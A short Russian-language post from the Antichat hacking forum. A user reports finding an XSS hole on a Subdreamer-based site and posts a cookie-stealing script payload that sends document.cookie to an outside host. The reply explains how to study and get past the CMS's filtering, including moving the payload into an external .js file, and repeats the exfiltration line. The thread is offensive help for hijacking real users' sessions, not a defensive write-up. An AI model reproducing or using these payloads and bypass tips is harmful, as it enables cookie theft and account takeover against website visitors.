Форум АНТИЧАТ - Показать сообщение отдельно

Цитата:

Сообщение от gadjet

Нашел на сайте XSS, однако при подстановке
>\"><script>img = new Image();img.src=\"http://antichat.ru/cgi-bin/s.jpg?\"+document.cookie;</script>
как будто бы обрезается все, что находится после ? и получается следующее:

<link>http://www......ru/<script>img = new Image();img.src=\"http://antichat.ru/cgi-bin/s.jpg</link>

Как решить эту проблему? Сайт стоит на Subdreamer.

Скачай Subdreamer и посмотри как там идет фильтрация даных и поймешь почему отрезается, а потом уже думай как это обойти

P.S В последних версиях CMS стоит фильтрация +document.cookie
P.S.S Сделай сылку на .js фаил и туда запихни

PHP код:


		
			
img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;